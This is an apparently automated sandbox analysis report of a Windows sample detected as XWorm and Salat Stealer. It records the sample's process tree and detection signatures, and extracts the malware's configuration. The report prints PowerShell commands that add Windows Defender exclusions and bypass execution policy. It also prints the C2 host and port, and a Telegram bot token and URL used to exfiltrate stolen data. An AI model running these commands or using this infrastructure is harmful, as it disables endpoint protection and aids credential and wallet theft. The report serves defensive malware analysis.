
Windows Analysis Report
KoaguarLoader.exe

Overview

General Information

Sample name: KoaguarLoader.exe
Analysis ID: 1635431
MD5: 17d315fd1070f02f6416bdbaef4013bf
SHA1: 3788e9c037f8cced6641b54253ca3e85c06db794
SHA256: ba66581906649d65334d3e234825bd3e1dd9b57b3a77fad66c3e942e552b6a5b
Tags: exe, XWorm, user-aachum

Detection

Salat Stealer, XWorm
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Salat Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • KoaguarLoader.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\KoaguarLoader.exe" MD5: 17D315FD1070F02F6416BDBAEF4013BF)
    • KoaguarLoader.exe (PID: 5744 cmdline: "C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe" MD5: FECE8E37429350B456E8E5555464B130)
      • I1y524I4zau1n3u.exe (PID: 3816 cmdline: "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe" MD5: FECE8E37429350B456E8E5555464B130)
    • svhost.exe (PID: 5248 cmdline: "C:\Users\user\AppData\Local\Temp\svhost.exe" MD5: 2A40AB34DCD3014E4EE93546DA6641D1)
      • powershell.exe (PID: 4732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7380 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7724 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • HkqNfKUrMBAD.exe (PID: 7336 cmdline: "C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe" MD5: FECE8E37429350B456E8E5555464B130)
  • I1y524I4zau1n3u.exe (PID: 7616 cmdline: "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe" MD5: FECE8E37429350B456E8E5555464B130)
  • svchost.exe (PID: 7860 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • HkqNfKUrMBAD.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe" MD5: FECE8E37429350B456E8E5555464B130)
  • I1y524I4zau1n3u.exe (PID: 5908 cmdline: "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe" MD5: FECE8E37429350B456E8E5555464B130)
  • svhost.exe (PID: 5568 cmdline: "C:\Users\user\AppData\Roaming\svhost.exe" MD5: 2A40AB34DCD3014E4EE93546DA6641D1)
  • cleanup
{"C2 url": ["develop-oregon.gl.at.ply.gg"], "Port": 41793, "Aes key": "123456789", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ", "Telegram Chatid": "1099820672", "Version": "XWorm V5.6"}
{"C2 url": "https://api.telegram.org/bot7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ/sendMessage"}
Source | Rule | Description | Author
KoaguarLoader.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security
KoaguarLoader.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
KoaguarLoader.exe | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  Strings:
  • 0x32bff8:$str01: $VB$Local_Port
  • 0x32c025:$str02: $VB$Local_Host
  • 0x32a9d4:$str03: get_Jpeg
  • 0x32ae61:$str04: get_ServicePack
  • 0x32d67d:$str05: Select * from AntivirusProduct
  • 0x32de0d:$str06: PCRestart
  • 0x32de21:$str07: shutdown.exe /f /r /t 0
  • 0x32ded3:$str08: StopReport
  • 0x32dea9:$str09: StopDDos
  • 0x32df9f:$str10: sendPlugin
  • 0x32e01f:$str11: OfflineKeylogger Not Enabled
  • 0x32e159:$str12: -ExecutionPolicy Bypass -File "
  • 0x32e624:$str13: Content-length: 5235
KoaguarLoader.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x32d1d5:$s6: VirtualBox
  • 0x32d133:$s8: Win32_ComputerSystem
  • 0x32e823:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x32e8c0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x32e9d5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x32e53f:$cnc4: POST / HTTP/1.1
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security
Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\svhost.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security
C:\Users\user\AppData\Local\Temp\svhost.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\svhost.exe | Andromeda_MalBot_Jun_1A | Detects a malicious Worm Andromeda / RETADUP | Florian Roth
  Strings:
  • 0xe1c9:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol
  • 0xebf8:$s2: svhost.exe
  • 0xec60:$s2: svhost.exe
C:\Users\user\AppData\Local\Temp\svhost.exe | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  Strings:
  • 0xaf64:$str01: $VB$Local_Port
  • 0xaf91:$str02: $VB$Local_Host
  • 0x9940:$str03: get_Jpeg
  • 0x9dcd:$str04: get_ServicePack
  • 0xc5e9:$str05: Select * from AntivirusProduct
  • 0xcd79:$str06: PCRestart
  • 0xcd8d:$str07: shutdown.exe /f /r /t 0
  • 0xce3f:$str08: StopReport
  • 0xce15:$str09: StopDDos
  • 0xcf0b:$str10: sendPlugin
  • 0xcf8b:$str11: OfflineKeylogger Not Enabled
  • 0xd0c5:$str12: -ExecutionPolicy Bypass -File "
  • 0xd590:$str13: Content-length: 5235
C:\Users\user\AppData\Local\Temp\svhost.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xc141:$s6: VirtualBox
  • 0xc09f:$s8: Win32_ComputerSystem
  • 0xd78f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xd82c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xd941:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xd4ab:$cnc4: POST / HTTP/1.1
(5 entries in total; only the first are shown)
Source | Rule | Description | Author
00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xbf39:$s6: VirtualBox
  • 0x1b151:$s6: VirtualBox
  • 0xbe97:$s8: Win32_ComputerSystem
  • 0x1b0af:$s8: Win32_ComputerSystem
  • 0xd587:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1c79f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xd624:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x1c83c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xd739:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1c951:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xd2a3:$cnc4: POST / HTTP/1.1
  • 0x1c4bb:$cnc4: POST / HTTP/1.1
00000010.00000002.1215210538.0000000000EDD000.00000040.00000001.01000000.0000000C.sdmp | JoeSecurity_SalatStealer | Yara detected Salat Stealer | Joe Security
00000017.00000001.1289075938.0000000000291000.00000040.00000001.01000000.00000009.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(28 entries in total; only the first are shown)
Source | Rule | Description | Author
3.2.svhost.exe.31e05f0.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
3.2.svhost.exe.31e05f0.0.unpack | Andromeda_MalBot_Jun_1A | Detects a malicious Worm Andromeda / RETADUP | Florian Roth
  Strings:
  • 0xc3c9:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol
  • 0xcdf8:$s2: svhost.exe
  • 0xce60:$s2: svhost.exe
  • 0xd47c:$s2: svhost.exe
  • 0xd4ec:$s2: svhost.exe
3.2.svhost.exe.31e05f0.0.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  Strings:
  • 0x9164:$str01: $VB$Local_Port
  • 0x9191:$str02: $VB$Local_Host
  • 0x7b40:$str03: get_Jpeg
  • 0x7fcd:$str04: get_ServicePack
  • 0xa7e9:$str05: Select * from AntivirusProduct
  • 0xaf79:$str06: PCRestart
  • 0xaf8d:$str07: shutdown.exe /f /r /t 0
  • 0xb03f:$str08: StopReport
  • 0xb015:$str09: StopDDos
  • 0xb10b:$str10: sendPlugin
  • 0xb18b:$str11: OfflineKeylogger Not Enabled
  • 0xb2c5:$str12: -ExecutionPolicy Bypass -File "
  • 0xb790:$str13: Content-length: 5235
3.2.svhost.exe.31e05f0.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xa341:$s6: VirtualBox
  • 0xa29f:$s8: Win32_ComputerSystem
  • 0xb98f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xba2c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xbb41:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xb6ab:$cnc4: POST / HTTP/1.1
0.3.KoaguarLoader.exe.a5f010.0.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
(42 entries in total; only the first are shown)

                        System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svhost.exe, ParentProcessId: 5248, ParentProcessName: svhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', ProcessId: 4732, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svhost.exe, ParentProcessId: 5248, ParentProcessName: svhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', ProcessId: 4732, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svhost.exe, ParentProcessId: 5248, ParentProcessName: svhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', ProcessId: 4732, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svhost.exe, ParentProcessId: 5248, ParentProcessName: svhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', ProcessId: 4732, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe, ProcessId: 5744, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HkqNfKUrMBAD
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svhost.exe, ParentProcessId: 5248, ParentProcessName: svhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', ProcessId: 4732, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\svhost.exe, ProcessId: 5248, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svhost.exe, ParentProcessId: 5248, ParentProcessName: svhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', ProcessId: 4732, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7860, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-11T17:12:32.762679+0100 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.8 | 49702 | 149.154.167.220 | 443 | TCP
2025-03-11T17:13:20.340127+0100 | 2853371 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49705 | 147.185.221.25 | 41793 | TCP
2025-03-11T17:12:32.762679+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49702 | 149.154.167.220 | 443 | TCP


                        AV Detection

Source: KoaguarLoader.exe | Avira: detected
Source: KoaguarLoader.exe | Avira: detected
Source: https://sa1at.ru/sa1at/ | Avira URL Cloud: Label: malware
Source: https://sa1at.ru/sa1at/RepetitionDurationIntervalEndBoundaryRepetitionDurationInterval2025-03-11T12: | Avira URL Cloud: Label: malware
Source: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/ | Avira URL Cloud: Label: malware
Source: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; | Avira URL Cloud: Label: malware
Source: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/ | Avira URL Cloud: Label: malware
Source: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/etext/ht | Avira URL Cloud: Label: malware
Source: develop-oregon.gl.at.ply.gg | Avira URL Cloud: Label: malware
Source: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/htm | Avira URL Cloud: Label: malware
Source: https://sa1at.ru/sa1at/etext/html; | Avira URL Cloud: Label: malware
Source: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https:// | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe | Avira: detection malicious, Label: TR/AD.GenSteal.qhukd
Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe | Avira: detection malicious, Label: TR/AD.GenSteal.qhukd
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Avira: detection malicious, Label: TR/AD.GenSteal.qhukd
Source: C:\Users\user\AppData\Roaming\svhost.exe | Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Users\user\AppData\Local\Temp\svhost.exe | Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["develop-oregon.gl.at.ply.gg"], "Port": 41793, "Aes key": "123456789", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ", "Telegram Chatid": "1099820672", "Version": "XWorm V5.6"}
Source: svhost.exe.5248.3.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ/sendMessage"}
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe | ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe | ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\svhost.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\svhost.exe | ReversingLabs: Detection: 91%
Source: KoaguarLoader.exe | Virustotal: Detection: 87%
Source: KoaguarLoader.exe | ReversingLabs: Detection: 94%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp | String decryptor: develop-oregon.gl.at.ply.gg
Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 41793
Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 123456789
Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp | String decryptor: <Xwormmm>
Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp | String decryptor: XWorm V5.6
Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp | String decryptor: USB.exe
Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp | String decryptor: %AppData%
Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp | String decryptor: svhost.exe
Source: KoaguarLoader.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49702 version: TLS 1.2

                        Networking

                        Source: Network trafficSuricata IDS: 2853371 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49705 -> 147.185.221.25:41793
                        Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49702 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.8:49702 -> 149.154.167.220:443
                        Source: Malware configuration extractorURLs: develop-oregon.gl.at.ply.gg
                        Source: global trafficTCP traffic: 147.185.221.25 ports 41793,1,3,4,7,9
                        Source: unknownDNS query: name: api.telegram.org
                        Source: global trafficTCP traffic: 192.168.2.8:49703 -> 147.185.221.25:41793
